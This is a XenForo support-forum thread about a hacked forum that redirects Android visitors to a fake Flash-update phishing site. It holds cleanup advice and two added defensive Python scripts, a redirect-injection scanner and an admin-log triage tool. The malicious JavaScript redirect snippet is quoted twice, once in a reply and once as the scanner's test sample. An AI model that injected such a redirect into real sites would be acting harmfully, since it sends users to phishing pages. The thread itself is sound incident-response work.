[Not a bug] XenForo exploit on Android phone

nailxx

Member
Hello!

I've used XenForo for 2 years or so and we've never stumbled upon security issues. However a day ago or so something happened and users visiting our forum from Android phones get redirected to a phishing site (http://flash-2012.com) that uses the Adobe Flash logo and says that your Flash version is obsolete and needs to be upgraded. Once a user agrees he gets redirected to porno, warez and other things like that.

The bug is not present on devices other than Android phones: not even on a Samsung Galaxy Tab tablet.

The forum is deployed at http://forum.amperka.ru. Just upgraded it from 1.1.0 to 1.1.3, it didn't help.

How could this have been done and what should I do to fix this?
 
Just upgraded it from 1.1.0 to 1.1.3, it didn't help.

This is bad...

Prevention is better than the cure, and in this case - as is the same with any software - it is so incredibly important to ensure that patches are applied as soon as is feasibly possible.

1.1.0 was released nearly a year ago... that's a long time to not install any updates.

Why have you left it so long, have you not renewed your support license?

I don't have an Android phone, so I can't test this myself.
 
I have sooo many small issues every day that I've just ignored those «new versions». My bad. But for now I'm here. And would be glad to receive some comments: could it ever be related to that SWF upload bug or not? If so, how could it be fixed?
 
It could be related to that. By upgrading to 1.1.3, that particular problem is now fixed, in that it won't be able to happen again. But the damage has now been done so there's going to be lots of work involved in finding out what's changed and putting it right.

I would start by searching your templates for references to the URL that they get redirected to. See if you can remove the reference and fix it that way. Failing that, do the following, probably in this order:

1) Reupload all files (not just the upgrade package) from version 1.1.3.
If the problem persists, then none of the core files have been changed.

2) Disable all add-ons. Definitely all of them, don't leave any running.
Try again - is the problem resolved? If so, then enable each add-on one by one and test again.

3) Rebuild the master data by going to http://yourforum.com/install
This doesn't delete or remove anything, but it will revert any changes made to the Master templates. And probably the master language - this may be relevant to you but hopefully your Russian translation has been installed as a separate language rather than a straight edit of the master language.

4) Create a new style with no parent (it will therefore be created from the Master templates).

5) Enable that new style and try again on an Android phone.
If the problem is resolved then it would suggest that there has been some sort of template modified which is redirecting users to that page. At this point, I'd probably be inclined to delete that style and start again from scratch.
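Added example (not posted by anyone in this thread, and not XenForo code): a small Python scanner that automates the first step above, searching a template export or the web root for a user-agent sniff followed by a redirect to an off-site host. The hostnames it treats as "own" (forum.amperka.ru) and the snippet it looks for are taken from this thread; the template file names in the demo and the 400-character search window are my own choices.

```python
import re
import tempfile
from pathlib import Path
from urllib.parse import urlparse

# Hostnames that may legitimately be redirect targets (from the thread).
OWN_HOSTS = {"forum.amperka.ru"}

# A user-agent sniff of the shape used by the injected snippet in this thread.
UA_SNIFF = re.compile(r"navigator\.userAgent\.match\(\s*/([^/]+)/i?\s*\)", re.I)
# An assignment to (window.)location(.href) with a literal URL.
REDIRECT = re.compile(r"""(?:window\.)?location(?:\.href)?\s*=\s*["']([^"']+)["']""", re.I)
MOBILE_TOKENS = ("android", "midp", "symbian", "windows mobile", "blackberry", "windows phone")


def scan_text(text, own_hosts=OWN_HOSTS):
    """Return findings as (redirect_url, ua_pattern, targets_mobile) for every
    off-site redirect that appears within 400 characters after a UA sniff."""
    findings = []
    for sniff in UA_SNIFF.finditer(text):
        pattern = sniff.group(1)
        window = text[sniff.end():sniff.end() + 400]
        for redir in REDIRECT.finditer(window):
            url = redir.group(1)
            host = urlparse(url).hostname or ""
            if host and host not in own_hosts:
                targets_mobile = any(tok in pattern.lower() for tok in MOBILE_TOKENS)
                findings.append((url, pattern, targets_mobile))
    return findings


def scan_tree(root, own_hosts=OWN_HOSTS, exts=(".php", ".html", ".js", ".txt")):
    """Walk a directory (an unpacked template export or the web root) and return
    {relative_path: findings} for every file containing a suspicious redirect."""
    root = Path(root)
    hits = {}
    for path in root.rglob("*"):
        if path.is_file() and path.suffix.lower() in exts:
            found = scan_text(path.read_text(errors="replace"), own_hosts)
            if found:
                hits[path.relative_to(root).as_posix()] = found
    return hits


# Constructed sample inputs: the snippet quoted later in this thread, and a
# benign HTTPS redirect to the forum's own host that must not be flagged.
INJECTED = """<script type="text/javascript">
<!--
if(navigator.userAgent.match(/(android|midp|j2me|symbian|series 60|symbos|windows mobile|windows ce|ppc|smartphone|blackberry|mtk|bada|windows phone)/i)!==null){
  window.location = "http://jakjak.ru/in.cgi?7";
}
//-->
</script>"""
CLEAN = """<script>if (location.protocol !== 'https:') { window.location = "https://forum.amperka.ru/"; }</script>"""


def demo():
    """Write both samples into a temporary tree (file names are made up) and
    scan it; only the file carrying the injected snippet should be reported."""
    with tempfile.TemporaryDirectory() as tmp:
        tpl = Path(tmp, "templates")
        tpl.mkdir()
        (tpl / "PAGE_CONTAINER.html").write_text("<html>" + INJECTED + "</html>")
        (tpl / "footer.html").write_text(CLEAN)
        return scan_tree(tmp)


if __name__ == "__main__":
    for path, findings in demo().items():
        for url, pattern, mobile in findings:
            print(f"{path}: redirect to {url} (mobile UA sniff: {mobile})")
```

Run it against the directory you export the style's templates into, or against the web root itself after step 1, and any file it names is the one to diff against a clean 1.1.3 copy. Redirects to your own hostnames are ignored on purpose, so add every domain you actually serve to OWN_HOSTS before trusting an empty result.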
 
Code:
<script type="text/javascript">
<!--
if(navigator.userAgent.match(/(android|midp|j2me|symbian|series 60|symbos|windows mobile|windows ce|ppc|smartphone|blackberry|mtk|bada|windows phone)/i)!==null){
  window.location = "http://jakjak.ru/in.cgi?7";
}
//-->
</script>

This is the code that is doing it, so it isn't an issue with XenForo, but with your forum having been compromised.

Follow what Chris said, and you should be able to track it down.
 
Oh, thank you for the hint. Playing with Firebug for an hour I couldn't find this. Thanks!

Will try to remove this gracefully.
 
Good find, that man. I looked through the code and missed it :)

There's one more thing:

You actually do need to trawl through your Admin Log to see if you can track down how this happened.

As well as there being an exploit as the possible cause, there's also every possibility that a "trusted" staff member might have done it. Or, at least, their account has been compromised.

It's often too easy to assume that problems have been caused by exploits or holes - in actuality the biggest security risk is ourselves and our passwords. You or one of your staff members may have unwittingly logged into a phishing page with your Admin account, or you might have a key logger on your machine... Don't assume that just because the problem has gone away and your forum is patched, the problem will go away for good. You really now need to identify the root cause for definite and ensure it doesn't happen again. If it was an exploit such as the swfupload one then great, you've fixed it. But if someone knows your password, or another admin's password, or even if you have a rogue staff member on your team, then this could easily happen again.
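Added example (my own, not from this thread or from XenForo): a triage script for the admin-log check suggested above. It assumes you have exported the admin log to CSV with the columns user_id, username, ip_address, request_date and request_url (that column set is an assumption, as is the sample data, which is constructed to look like the thread's description: two real admins, plus an unknown account active for about 15 minutes that edits a template).

```python
import csv
import io
from collections import defaultdict
from datetime import datetime

# Assumed: the user ids of the two legitimate admins ("only 2 forum admins").
KNOWN_ADMINS = {1, 2}

# Constructed sample export of the admin log (columns are an assumption).
SAMPLE_LOG = """user_id,username,ip_address,request_date,request_url
1,nailxx,203.0.113.10,2012-05-10 09:12:01,admin.php?options/
4093,support_tmp,198.51.100.7,2012-05-11 02:03:14,admin.php?users/save
4093,support_tmp,198.51.100.7,2012-05-11 02:05:40,admin.php?templates/PAGE_CONTAINER.1/edit
4093,support_tmp,198.51.100.7,2012-05-11 02:17:55,admin.php?templates/PAGE_CONTAINER.1/save
2,second_admin,203.0.113.11,2012-05-11 08:30:00,admin.php?add-ons/
"""


def parse_log(text):
    """Parse the CSV export into a list of dicts with typed fields."""
    rows = []
    for r in csv.DictReader(io.StringIO(text)):
        rows.append({
            "user_id": int(r["user_id"]),
            "username": r["username"],
            "ip": r["ip_address"],
            "when": datetime.strptime(r["request_date"], "%Y-%m-%d %H:%M:%S"),
            "url": r["request_url"],
        })
    return rows


def triage(rows, known_admins=KNOWN_ADMINS):
    """Group admin actions per actor and report the suspicious ones.

    An actor is suspicious if its user id is not in the admin allowlist, or if
    a known admin acted from more than one IP address (possible stolen session
    or password). Each report entry carries the activity window, the IPs, every
    URL touched and the subset of URLs that modify templates."""
    by_user = defaultdict(list)
    for r in rows:
        by_user[r["user_id"]].append(r)

    report = []
    for uid, acts in by_user.items():
        acts.sort(key=lambda a: a["when"])
        ips = {a["ip"] for a in acts}
        reasons = []
        if uid not in known_admins:
            reasons.append("user id not in admin allowlist")
        if len(ips) > 1:
            reasons.append("actions from multiple IPs")
        if not reasons:
            continue
        urls = [a["url"] for a in acts]
        report.append({
            "user_id": uid,
            "username": acts[0]["username"],
            "first": acts[0]["when"],
            "last": acts[-1]["when"],
            "duration_s": int((acts[-1]["when"] - acts[0]["when"]).total_seconds()),
            "ips": sorted(ips),
            "urls": urls,
            "template_actions": [u for u in urls if "templates/" in u],
            "reasons": reasons,
        })
    return report


if __name__ == "__main__":
    for entry in triage(parse_log(SAMPLE_LOG)):
        print(f"{entry['username']} (id {entry['user_id']}): {', '.join(entry['reasons'])}")
        print(f"  active {entry['first']} .. {entry['last']} ({entry['duration_s']} s) from {entry['ips']}")
        for url in entry["template_actions"]:
            print(f"  template change: {url}")
```

The template_actions list is the part to act on first: every template it names should be compared against a clean copy, regardless of whether the redirect snippet has already been removed. Keep the IPs from the report too; the next step in the thread (checking the server logs) is far quicker when you know which address and time window to look for.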
 
Thanks, men!

I've deleted the parasitic snippet. For now the problem is gone.

Looking at the admin log I found that the change was done by someone with administrator privileges. I've never seen this user before and his activity lasted for only 15 minutes. We're a small company and there are only 2 forum admins. I trust them 100%. I've deleted the fake admin.

Could that SWF bug allow creation of a new admin account without our approval?
 
I very recently saw a similar thing happen to a different forum. They were running 1.1.2 and hadn't yet had time to upgrade to 1.1.3 or even use the single file fix that was provided.

I can only assume it was the swfupload vulnerability.
 
Could that SWF bug allow creation of a new admin account without our approval?

YES (but normally when there is something else supporting it)

I would also check your server logs to be sure nothing else is the root cause. Old server software or improperly set permissions (on the server) are normally what causes issues.
 